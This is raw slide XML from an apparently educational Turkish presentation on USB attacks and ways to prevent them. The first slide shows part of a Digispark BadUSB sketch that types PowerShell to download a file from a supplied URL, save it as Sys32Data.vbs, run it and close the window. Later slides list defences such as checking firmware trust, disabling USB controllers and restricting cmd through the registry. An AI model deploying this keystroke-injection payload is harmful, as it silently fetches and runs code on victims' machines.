              <a:t>("$client = new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_ENTER);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(1000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>client.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>Dosyanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>indirileceği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>adresini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> gir','Sys32Data.vbs')");</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_ENTER);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>("start Sys32Data.vbs");</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_ENTER);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(1000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_F4|MOD_ALT_LEFT); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>kapat</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(50000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="584564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C785386-A750-461A-BF02-435A101DF9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sr-Latn-CS" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB saldırılarını önleme yöntemlerinin incelenmesi </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FA9BE3-416F-45F4-9D9F-6CB970821999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="10353762" cy="4482536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bir USB belleğin güvenli olarak bağlanılması için aşağıdaki sorular kontrol edilmelidir:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>1.Flash sürücünüzün bellenimini kimin geliştirdiğini biliyor musunuz? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>2.Bellenim arka kapılar ve kötü amaçlı işlevler açısından denetlendi mi?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>3.Sürücünüzde çalışan bellenimin üretim sırasında veya sonrasında kötü amaçla değiştirilmediğini onaylayabilir misiniz?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Eğer yukarıdaki soruların herhangi birine “evet” cevap verilemiyorsa bu USB cihazı güvenilir değildir. Güvenilmeyen USB cihazı bilgisayarınızdaki verileri saldırgan tarafından çalınmasını sağlayabilir ve cihazınızda arka kapı açılmasına sebep olabilir. Sıfır olmayan bir USB bellek içinde bunlar geçerlidir çünkü ne kadar güvenilir olduğu bilinmemektedir. Bu sebepten dolayı güvenilirliği teyit edilemeyen USB belleklere karşı alınabilecek yöntemlerden bazıları şunlardır;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252654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D8814BC-DC3B-4021-9019-2376A792F7FC}"/>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EFD3CE21-09A0-4313-9C95-9700B28D20F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096063"/>
            <a:ext cx="10353762" cy="4580961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Güvenilirliği teyit edilemeyen USB belleklere karşı alınabilecek yöntemlerden bazıları şunlardır;</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" b="1" i="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Engelleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Aygıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Yöneticisi'nde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB'nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>engelleyebilirsiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Farenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuşuyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>istediğiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>denetleyicisini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>seçin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bırak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>seçeneğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tıklayın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ayrıcalık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kısıtlaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Denetimi'ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanmaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöneticisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görevlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>getirmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> her zaman minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hakları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vermelidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yönetici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrıcalıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmadan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hesaplarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanmayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>istemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yükseltmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>örneğin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kısıtlamayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içerir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu, HKEY_CURRENT_USER\Software\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Poli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>\Microsoft\Windows\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yoluna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>DisableCMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>adlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>anahtar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dahil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kayıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>defteri</a:t>
